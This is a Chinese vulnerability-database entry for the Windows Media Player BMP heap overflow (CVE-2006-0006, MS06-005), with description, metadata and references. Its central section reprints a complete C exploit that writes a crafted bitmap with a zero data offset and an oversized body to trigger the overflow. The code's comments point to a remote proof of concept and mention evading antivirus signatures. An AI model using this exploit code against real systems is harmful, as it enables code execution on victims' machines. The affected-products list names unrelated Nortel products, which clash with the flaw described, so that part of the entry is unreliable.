Microsoft Windows Media Player畸形位图文件处理堆溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109764 漏洞类型 缓冲区溢出
发布时间 2006-02-15 更新时间 2006-04-12
CVE编号 CVE-2006-0006 CNNVD-ID CNNVD-200602-197
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/1500
https://www.securityfocus.com/bid/16633
https://cxsecurity.com/issue/WLB-2006020032
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-197
|漏洞详情
MicrosoftWindowsMediaPlayer是一款非常流行的媒体播放器。MicrosoftWindowsMediaPlayer在处理畸形的位图文件时存在漏洞,攻击者可能利用此漏洞在用户机器上执行任意指令。WindowsMediaPlayer可以播放位图格式文件(如.bmp文件)并解码bmp文件,但没有正确地处理声明大小为0的bmp文件。在这种情况下,WMP会分配大小为0的堆,但实际上会以实际文件长度拷贝数据到这个堆,因此声明大小为0的bmp文件会导致溢出。攻击者可以通过诱骗用户使用WindowsMediaPlayer打开特制的位图文件导致执行任意指令。
|漏洞EXP
/*
* For Remote Exploration (hint):
* http://www.spyinstructors.com/atmaca/research/wmp_remote_poc.asx
*/

/*
*
* Windows Media Player BMP Heap Overflow (MS06-005)
* Bug discovered by eEye - http://www.eeye.com/html/research/advisories/AD20060214.html
* Exploit coded by ATmaCA
* Web: http://www.spyinstructors.com  && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan
*
*/

/*
*
* Systems Affected:
* Microsoft Windows Media Player 7.1 through 10
*
* Windows NT 4.0
* Windows 98 / ME
* Windows 2000 SP4
* Windows XP SP1 / SP2
* Windows 2003
*
*
*/

/*
*
* In this vulnerability,payload is loaded to different places in memory each time.
* but some time is very easy to call our shell code :
* http://www.spyinstructors.com/atmaca/research/wmp.JPG
* but some times not =) because of ,no shell this time
*
*/

/*
*
* Microsoft has released a patch for this vulnerability.
* The patch is available at:
* http://www.microsoft.com/technet/security/bulletin/ms06-005.mspx
*
*/

#include <windows.h>
#include <stdio.h>

#define BITMAP_FILE_SIZE        0xA8D2
#define BITMAP_FILE_NAME        "crafted.bmp"

#pragma pack( push )
#pragma pack( 1 )

// bitmap file format - http://atlc.sourceforge.net/bmp.html
//File information header provides general information about the file
typedef struct _BitmapFileHeader {
  WORD    bfType;
  DWORD   bfSize;
  WORD    bfReserved1;
  WORD    bfReserved2;
  DWORD   bfOffBits;
} BMPFHEADER;

//Bitmap information header provides information specific to the image data
typedef struct _BitmapInfoHeader{
  DWORD  biSize;
  LONG   biWidth;
  LONG   biHeight;
  WORD   biPlanes;
  WORD   biBitCount;
  DWORD  biCompression;
  DWORD  biSizeImage;
  LONG   biXPelsPerMeter;
  LONG   biYPelsPerMeter;
  DWORD  biClrUsed;
  DWORD  biClrImportant;
} BMPIHEADER;

#pragma pack( pop )

int main(void)
{
        FILE *File;
        BMPFHEADER *bmp_fheader;
        BMPIHEADER *bmp_iheader;
        char *pszBuffer;

        printf("\nWindows Media Player BMP Heap Overflow (MS06-005)");
        printf("\nBug discovered by eEye");
        printf("\nExploit coded by ATmaCA");
        printf("\nWeb: http://www.spyinstructors.com  && http://www.atmacasoft.com");
        printf("\nE-Mail: atmaca@icqmail.com");
        printf("\nCredit to Kozan");


        if ( (File = fopen(BITMAP_FILE_NAME,"w+b")) == NULL ) {
                printf("\n [E:] fopen()");
                exit(1);
        }

        bmp_fheader=(BMPFHEADER*)malloc(sizeof(BMPFHEADER));
        bmp_iheader=(BMPIHEADER*)malloc(sizeof(BMPIHEADER));
        pszBuffer = (char*)malloc(BITMAP_FILE_SIZE);

        memset(pszBuffer,0x41,BITMAP_FILE_SIZE);

        bmp_fheader->bfType = 0x4D42; // "BM"
        bmp_fheader->bfSize = BITMAP_FILE_SIZE;
        bmp_fheader->bfReserved1 = 0x00;
        bmp_fheader->bfReserved2 = 0x00;

        // eEye - MAGIC
        // Antiviruses will get the signature from here!!!
        bmp_fheader->bfOffBits = 0x00; //( sizeof(BMPFHEADER) + sizeof(BMPIHEADER) );

        bmp_iheader->biSize = 0x28;
        bmp_iheader->biWidth = 0x91;
        bmp_iheader->biHeight = 0x63;
        bmp_iheader->biPlanes = 0x01;
        bmp_iheader->biBitCount = 0x18;
        bmp_iheader->biCompression = 0x00;
        bmp_iheader->biSizeImage = 0xA89C;
        bmp_iheader->biXPelsPerMeter = 0x00;
        bmp_iheader->biYPelsPerMeter = 0x00;
        bmp_iheader->biClrUsed = 0x00;
        bmp_iheader->biClrImportant = 0x00;

        memcpy(pszBuffer,bmp_fheader,sizeof(BMPFHEADER));
        memcpy(pszBuffer+sizeof(BMPFHEADER),bmp_iheader,sizeof(BMPIHEADER));

        fwrite(pszBuffer, BITMAP_FILE_SIZE-1, 1,File);
        fwrite("\x00", 1,1, File); //Terminator

        fclose(File);
        printf("\n\n"  BITMAP_FILE_NAME" has been created in the current directory.\n");

        return 1;
}

// milw0rm.com [2006-02-15]
|受影响的产品
Nortel Networks Symposium TAPI Service Provider Nortel Networks Symposium Agent Nortel Networks MCS 5200 3.0 Nortel Networks MCS 5100 3.0 Nortel Networks IP softphone 2050
|参考资料

来源:US-CERT
名称:TA06-045A
链接:http://www.us-cert.gov/cas/techalerts/TA06-045A.html
来源:US-CERT
名称:VU#291396
链接:http://www.kb.cert.org/vuls/id/291396
来源:BID
名称:16633
链接:http://www.securityfocus.com/bid/16633
来源:MS
名称:MS06-005
链接:http://www.microsoft.com/technet/security/bulletin/ms06-005.mspx
来源:VUPEN
名称:ADV-2006-0574
链接:http://www.frsirt.com/english/advisories/2006/0574
来源:MISC
链接:http://www.eeye.com/html/research/advisories/AD20060214.html
来源:SECTRACK
名称:1015627
链接:http://securitytracker.com/id?1015627
来源:SECUNIA
名称:18835
链接:http://secunia.com/advisories/18835
来源:XF
名称:win-media-player-bmp-bo(24488)
链接:http://xforce.iss.net/xforce/xfdb/24488
来源:BUGTRAQ
名称:20060215WindowsMediaPlayerBMPHeapOverflow(MS06-005)
链接:http://www.securityfocus.com/archive/1/archive/1/425158/100/0/threaded
来源:BUGTRAQ
名称:20060214[EEYEB-20051017]WindowsMediaPlayerBMPHeapOverflow
链接:http://www.securityfocus.com/archive/1/archive/1/424983/100/0/threaded
来源:SREASON
名称:423
链接:http://securityreason.com/securityalert/423